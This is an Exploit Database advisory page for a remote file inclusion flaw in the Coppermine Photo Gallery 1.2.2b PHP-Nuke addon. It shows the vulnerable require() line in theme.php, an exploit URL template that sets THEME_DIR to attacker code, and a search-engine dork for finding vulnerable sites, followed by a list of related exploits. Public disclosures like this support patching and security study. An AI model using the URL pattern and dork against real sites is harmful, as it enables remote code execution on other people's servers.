Exploit Database - Logo

Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion

EDB-ID: 2375 Author: 3l3ctric-Cracker Published: 2006-09-15
CVE: N/A Type: Webapps Platform: PHP GHDB-ID: 1909
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include
Vulnerability
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Level:Dangerous
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Affected Versions:
1.0 RC3
1.1 beta 2
1.1 .0
1.2
1.2.1
1.2.2 b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code in: themes.php
Vul code:Vul code:require($THEME_DIR."/user_list_info_box.inc");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit
victim.com/modules/coppermine/themes/default/theme.php?THEME_DIR=evill code
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
dork: Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine
Photo Gallery v1.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Greetz:str0ke-Thehacker-AsianEagle-Nukedx-NETTOXIC-All Ayyildiz Team
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2006-09-15]
« Previous Exploit Next Exploit »

Related Exploits

Trying to match setup file: 945c36ab2100eeab3a8b56542a712248
Other Possible E-DB Search Terms: Coppermine Photo Gallery 1.2.2b (Nuke Addon),  Coppermine Photo Gallery 1.2.2b,  Coppermine Photo Gallery
Date D V Title Author
2012-06-20 Verified Coppermine Photo Gallery - 'index.php' Script SQL InjectionTaurus Omar
2003-04-07 Verified Coppermine Photo Gallery 1.0 - PHP Code InjectionBerend-Jan ...
2004-04-30 Verified Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site ScriptingJanek Vind
2004-04-30 Verified Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File InclusionJanek Vind
2010-07-03 Verified Coppermine Photo Gallery 1.4.14 - 'picEditor.php' Command Execution (Metasploit)Metasploit
2008-01-30 Verified Coppermine Photo Gallery 1.4.14 - Remote Command Executionwaraxe
2004-04-30 Verified Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File InclusionJanek Vind
2004-04-30 Verified Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Traversal Arbitrary File AccessJanek Vind
2005-11-13 Verified Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL InjectionDiGiTAL_MiDWAY
2007-02-24 Verified Coppermine Photo Gallery 1.3.x - Blind SQL Injections0cratex
2007-08-08 Verified Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File InclusionMa$tEr-0F-D...
2008-01-21 Verified Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injectionbazik
2007-01-05 Verified Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL InjectionDarkFig
2007-02-05 Verified Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusionsanonymous
2008-01-22 Verified Coppermine Photo Gallery 1.4.10 - SQL InjectionRST/GHC
2007-01-05 Verified Coppermine Photo Gallery 1.4.11 - SQL InjectionDarkFig
2007-09-17 Verified Coppermine Photo Gallery 1.4.12 - 'log' Local File InclusionL4teral
2007-09-17 Verified Coppermine Photo Gallery 1.4.12 - 'referer' Cross-Site ScriptingL4teral
2008-07-31 Verified Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code ExecutionEgiX
2009-01-29 Verified Coppermine Photo Gallery 1.4.19 - Remote File UploadMichael Brooks
2009-02-26 Verified Coppermine Photo Gallery 1.4.20 - 'IMG' Privilege EscalationInphex
2009-02-26 Verified Coppermine Photo Gallery 1.4.20 - BBCode IMG Privilege EscalationStAkeR
2009-04-29 Verified Coppermine Photo Gallery 1.4.21 - 'css' Cross-Site ScriptingGerendi San...
2009-05-18 Verified coppermine photo Gallery 1.4.22 - Multiple Vulnerabilitiesgirex
2009-05-19 Verified Coppermine Photo Gallery 1.4.22 - SQL Injectiongirex
Menu